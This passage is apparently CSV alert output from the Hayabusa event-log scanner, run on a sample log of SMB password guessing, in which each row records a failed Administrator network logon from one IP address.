NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wX2R08dxiEcRNzcM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcN791fdSHwaWuBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CRObbkQsykQma2Tn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v4UvU7VglbA2p0Z9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ODkwHD0dwGaWhVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bPQ5GsX1UUXA6ws | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bvRQ0dVaLawXoo2O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjxwDdOYBDDSJGun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czlTDa1F6edSUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mrtgv5HAqRuelEvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfny9Y4SGRZTUXi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hdhoRgnyj4JPpN2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K4Qclkpq5ZMKmdCB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GdZSrcqmfGBfAVy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XA7eJrFopzOb3YQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2XoSwawv7Ji26GQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 637CaCAc9u7z99X7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Y6Pww45qxQjrZ0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5CPU20SF5i6Cdq34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HAdaPDVTws6TObvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KUCoisntgbX7Mnis | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MFN0b769jRyDxyAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKr2OCyezvSEsHBZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QN3snXM4mwhauvvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1VpvQgnwXVxRY1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5bsnUZjpHrbD6kN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hpL2QnQ0kKqU40a6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rpkpNfeTsOeXEsJ0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5mBhuTFm02IjipEw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ908ZOCkSBC7tms | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8l7Bct5nMTZHd5mK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRk6e7SrInMDsdMV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhGByctTcM7NXGtB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BgzhW3Pd5JAB8j4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZOm1J5kdItrQpGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DK77Hylw8CJHVGvb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pf7DQVQY7AowT8NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4us3HR9jseQWIHt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJRmgooz8CXjB6E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkjIXxAvEDrPFUpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ENc8aqouBangyUrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7flMdluc8YRhOuzn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WFqeMJIXGDjDP0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iKeRDzfuDCJSv4Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gNEYkgBoG8rAE6SP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vyy1aBvh6lJBs5M5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhiWNroUS5X5AEh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg9rUUIwEfujwCvq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zfvpeyTKc3YYkVkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJGR6CYKLUJp2fWl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cmSap0AJZq0KMRBV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnVCbq1IYZF19oYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVaDMa2uNXTZNcBj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymf6Fhv5ieWwcq73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CT6YMlX1GqeEuAHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FDJ1IFpMNQ2Euhyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EGTzqnHJIiZdSgNk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: epSckAKbAp8qag89 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NNC8ilAuznKPwFvV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wObt647cIBPiVaZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nYDe1L7NNxDGQ0Vt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXroClxv7B0aCTYv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kCVah2QOH1hMSV76 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2HjD65Xy4Hppim2l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwmEQxC4iTcF4aFu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q3QxOH7ok8RR068t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJFj6Ckw1HdK9w52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qqu3Im4HXQNyGnYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bk5dmjQDnpSlREum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pk4BvYgXBR2whf80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6n1su2TUr7ONQr4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: givsEAGfG0smN9Re | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i2YuM0i7a2QuY7xb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xuocQPZpd91adY0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PvGB1dZrfDWyZoqs | IP Addr: 192.168.198.149 | AuthPackage: 